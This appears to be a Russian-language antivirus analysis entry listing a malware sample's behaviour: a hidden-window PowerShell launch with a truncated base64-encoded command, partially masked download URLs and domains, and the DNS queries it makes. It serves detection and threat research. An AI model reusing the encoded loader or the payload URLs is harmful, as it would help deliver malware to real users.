Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABVADIANgA2ADgAOAA2ADMAPQAnAGkANAA5AF8AOABfADcAJwA7ACQAVQA2AF8AMwAyADIANwAgAD0AIAAnADYANAAnADsAJAB6ADcANAAxAF8AMwBfAD0AJwB3ADAAOAAxADcAOAA5ACcAOwAkAHMAMQAxADgAOABfADIAXwA9ACQAZQBuAHYAOgB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1548
- %TEMP%\1187635.cvr
- 'ab####complex.ir':80
- 'mu##anh.com':80
- 'pa######morialjapi.com.br':80
- http://ab####complex.ir/_bk/WdZfezpxN/
- http://mu##anh.com/wp-admin/PjlpyJPzD/
- http://pa######morialjapi.com.br/df8idr3/5i5oqn_7rjae-3/
- DNS ASK cr######ican-iop-milo.com
- DNS ASK ab####complex.ir
- DNS ASK mu##anh.com
- DNS ASK al####opiedades.cl
- DNS ASK pa######morialjapi.com.br
- DNS ASK pa########rialjapi.com.brdf8idr3
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABVADIANgA2ADgAOAA2ADMAPQAnAGkANAA5AF8AOABfADcAJwA7ACQAVQA2AF8AMwAyADIANwAgAD0AIAAnADYANAAnADsAJAB6ADcANAAxAF8AMwBfAD0AJwB3ADAAOAAxADcAOAA5ACcAOwAkAHMAMQAxADgAOABfADIAXwA9ACQAZQBuAHYAOgB...' (со скрытым окном)